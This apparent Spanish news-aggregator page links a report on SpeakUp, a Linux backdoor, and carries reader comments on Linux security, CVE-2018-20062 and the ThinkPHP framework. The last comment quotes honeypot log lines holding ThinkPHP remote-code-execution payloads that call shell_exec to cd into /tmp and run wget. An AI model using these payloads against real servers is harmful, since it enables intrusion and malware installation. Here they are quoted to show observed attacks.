Portada
Hace 5 años | Por geralt_ a zonamovilidad.es
Publicado hace 5 años por geralt_ a zonamovilidad.es

SpeakUp, el nuevo malware que ataca a Linux

 zonamovilidad.es

Un grupo de investigadores de la firma de ciberseguridad israelí Check Point han descubierto una campaña contra los servidores Linux que trabaja creando una puerta trasera o backdoor maliciosa que le permite esquivar a los proveedores de seguridad. Este troyano, conocido como SpeakUp, aprovecha las vulnerabilidades conocidas en hasta seis versiones distintas de Linux y ataca principalmente a servidores del este de Asia y Latinoamérica, incluyendo dispositivos alojados en AWS. SpeakUp se propaga internamente dentro de la subred infectada...

Etiquetas

DE3C548D-E347-406A-A60F-E6BBD322CAB7 146 11

Comentarios

D
editado

Un momento...@ralph, ¿este no era ese sistema mágico donde no ten podían entrar mierdas aunque no actualizases?

V 2
K 33
D
editado

#2 Falacia hombre de paja.
Linux es estadísticamente más seguro que Windows. Pero no existe ningún sistema 100% ni suelo leer o escuchar a nadie defender que Linux lo es.

Por cierto:
CVE Dictionary Entry:
CVE-2018-20062
NVD Published Date:
12/11/2018

Y el fallo es de la aplicación NoneCms. Que yo sepa no está en los repositorios de ninguna distro.
Tan popular es el tal NoneCms que si lo buscas solo aparecen referencias a esta CVE lol

V 4
K 40
D

#3 Falacia de hombre de paja, no. Su comentario era, literalmente "prefiero un sistema sin actualizar que uno en el que te puede instalar mierdas sin enterarte...". Eso de que no hay ningún sistema 100% es algo obvio.

V 1
K 11
D

#4 Contesto a lo que tu dices y se ve a las claras que es tu interpretación no una cita literal.
De todas maneras. Si el sistema sin actualizar es Linux y el actualizado es Windows, también me quedaría con Linux.

V 0
K 7
D
editado

#5 Claro. Las barbas mágicas de Stallman te protegerán de todos los males y los salmos de la GPL de las malas intenciones ajenas. Se entiende. 🙈

V 1
K 24
D

#7 Falacia de hombre de paja de nuevo.

V 0
K 7
empanadilla.cosmica

#5 Tranquilo, he llegado a ver 18 años de uptime con un Solaris sin actualizar.

El problema es que eos servidores de la noticia son alcanzables desde Internet. Si están dentro de la empresa y no son visibles desde fuera es menos dramático.

La seguridad es un proceso continuo. Da igual que un sistema tenga muchas vulnerabilidades o pocas. Con que tenga solo una que alguien haya explotado para joderte vivo.

Administro aún servidores con Windows 2000 y con HP-UX 11.00 o Solaris 8.

Están completamente desfasados pero no son accesibles desde fuera. Y los productos que corren encima no tienen soporte. Es un riesgo moderado, pero si están accesibles desde fuera es un riesgo muy alto.

Hace poco reemplazamos unos router que tienen un vulnerabilidad que el suministrador ha dicho que no va a parchear porque ese modelo está sin soporte.

¿En serio arriesgar la seguridad de tu cliente o la tuya propia y de la de quienes comparten red contigo merece la pena?

Vamos a ver, si te quieren joder quizás puedan, pero será con una vulnerabilidad nueva que acaba de salir del laboratorio de los ciberatacantes, o entre el tiempo que se publica el parche y lo instalas. Lo que no puedes es dejarle a todos los puñeteros niñatos que no tienen ni idea la oportunidad de que te jodan por hobby sin currárselo nada.

V 2
K 22
D

#3

V 0
K 7
comadrejo
editado

#3 Ciertamente esa parece ser la "criatura" del problema: https://github.com/nangge/noneCms

Casi sin actividad y con el "asunto" abierto desde el 11 de Diciembre.
https://github.com/nangge/noneCms/issues/21

El éxito de este malware va a ser impresionante.

V 1
K 14
comadrejo
editado

#10 Me voy a realizar una gran autocorrección.

El problema esta en este framework: https://github.com/top-think/framework

Y creo que se podría reproducir lo de lanzar un shell remoto con cualquier plataforma que tenga instalado ese framework sin enjaular.
Como no domino el chino, no me que queda claro si el asunto ya esta solucionado.

Los de Check Point https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/ te recomiendan que les compres el "Check Point IPS blade" para protegerte y de paso te informan de lo mala que es la competencia: https://research.checkpoint.com/wp-content/uploads/2019/01/fig3-1.png

V 0
K 6
D

Ahora ya sé de donde venía esto el log del honeypot del router:
/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http
/public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%20cd%20/tmp;%20wget%20http
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http
/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http

V 1
K 16